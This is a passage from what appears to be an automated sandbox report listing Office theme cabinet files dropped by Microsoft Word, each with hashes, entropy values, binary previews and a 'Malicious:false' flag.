                                                                                                                            SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):723359
                                                                                                                            Entropy (8bit):7.997550445816903
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                                                                                                            MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                                                                                            SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                                                                                            SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                                                                                            SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):640684
                                                                                                                            Entropy (8bit):7.99860205353102
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                                                                                                            MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                                                                                            SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                                                                                                            SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                                                                                            SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):698244
                                                                                                                            Entropy (8bit):7.997838239368002
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                                                                                                            MD5:E29CE2663A56A1444EAA3732FFB82940
                                                                                                                            SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                                                                                            SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                                                                                            SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1097591
                                                                                                                            Entropy (8bit):7.99825462915052
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                                                                                                            MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                                                                                            SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                                                                                            SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                                                                                            SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1065873
                                                                                                                            Entropy (8bit):7.998277814657051
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                                                                                                            MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                                                                                            SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                                                                                            SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                                                                                            SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):953453
                                                                                                                            Entropy (8bit):7.99899040756787
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                                                                                                            MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                                                                                            SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                                                                                            SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                                                                                            SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1310275
                                                                                                                            Entropy (8bit):7.9985829899274385
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                                                                                                            MD5:9C9F49A47222C18025CC25575337A965
                                                                                                                            SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                                                                                            SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                                                                                            SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1881952
                                                                                                                            Entropy (8bit):7.999066394602922
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                                                                                                            MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                                                                                            SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                                                                                            SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                                                                                            SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1766185
                                                                                                                            Entropy (8bit):7.9991290831091115
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                                                                                                            MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                                                                                            SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                                                                                            SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                                                                                            SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2527736
                                                                                                                            Entropy (8bit):7.992272975565323
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                                                                                                            MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                                                                                            SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                                                                                            SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                                                                                            SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2591108
                                                                                                                            Entropy (8bit):7.999030891647433
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                                                                                                            MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                                                                                            SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                                                                                            SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                                                                                            SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3256855
                                                                                                                            Entropy (8bit):7.996842935632312
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                                                                                                            MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                                                                                            SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                                                                                            SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                                                                                            SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3417042
                                                                                                                            Entropy (8bit):7.997652455069165
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                                                                                                            MD5:749C3615E54C8E6875518CFD84E5A1B2
                                                                                                                            SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
